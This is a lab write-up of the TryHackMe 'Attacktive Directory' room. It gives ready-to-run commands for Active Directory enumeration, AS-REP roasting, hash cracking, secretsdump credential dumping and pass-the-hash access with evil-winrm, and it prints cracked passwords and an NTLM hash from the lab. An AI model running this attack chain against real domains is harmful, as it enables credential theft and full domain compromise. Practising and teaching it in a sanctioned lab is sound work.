【THM】Attacktive Directory-Practice

本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/attacktivedirectory

Difficulty: Medium

1
nmap -p- -sC -sV -T4 10.10.245.159

image-20231121190245651

image-20231121190252283

Task 3 Welcome to Attacktive Directory

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

The next step, enumerating the two ports used by AD *139* and *445* with enum4linux the flag -a stands for all simple enumeration, It will gather information for us including (userlist, machine list(s), sharelist, password policy information, group and member list, …)

Task 4 Enumerating Users via Kerberos

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

image-20231121210536099

1
./kerbrute_linux_amd64 userenum --dc=10.10.245.159 -d=spooky.local userlist.txt

image-20231121213202685

I saved the usernames into another file to make things easier.

image-20231121213411728

Task 5 Abusing Kerberos

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Impacket has a tool called “GetNPUsers.py” (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

1
python /opt/impacket/examples/GetNPUsers.py -usersfile validusers.txt -no-pass -dc-ip 10.10.245.159 spookysec.local/

image-20231121214838989

So only *svc-admin* can request for a ticket without providing it’s password. Let’s grab the hash given and determine what it is over at hashcat.net

hashcat碰撞失败,待分析

1
hashcat -m 18200 hash.txt passwordlist.txt

image-20231121222107958

提示这个

Device #1: Not enough allocatable device memory for this attack.

but 我用windows

image-20231121222757407

management2005

Task 6 Back to the Basics

With a user’s account credentials we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.

image-20231121223224168

1
smbclient -L 10.10.245.159 -U "svc-admin"

image-20231121223740053

image-20231121225038113

image-20231121225117516

image-20231121225113310

image-20231121225437652

Task 7 Elevating Privileges within the Domain

使用我们的新凭据,我们可以获得更高的访问权限。此备份帐户可以是整个域控制器的备份,允许将所有 AD 更改(包括密码哈希)同步到此帐户。我们可以使用一个不同的 impacket 工具 secretsdump.py 来检索我们可以访问的所有密码哈希

1
python /opt/impacket/examples/secretsdump.py backup:backup2517860@10.10.245.159

image-20231121230429453

谷歌搜索以查看使用 NTLM 哈希进行横向移动的方法是什么

https://www.manageengine.com/products/eventlog/cyber-security/pass-the-hash-attack.html?source=post_page-----76731d298c29--------------------------------

1
gem install evil-winrm
1
evil-winrm -i 10.10.245.159 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

image-20231121231352145

image-20231121231246256

image-20231121231337780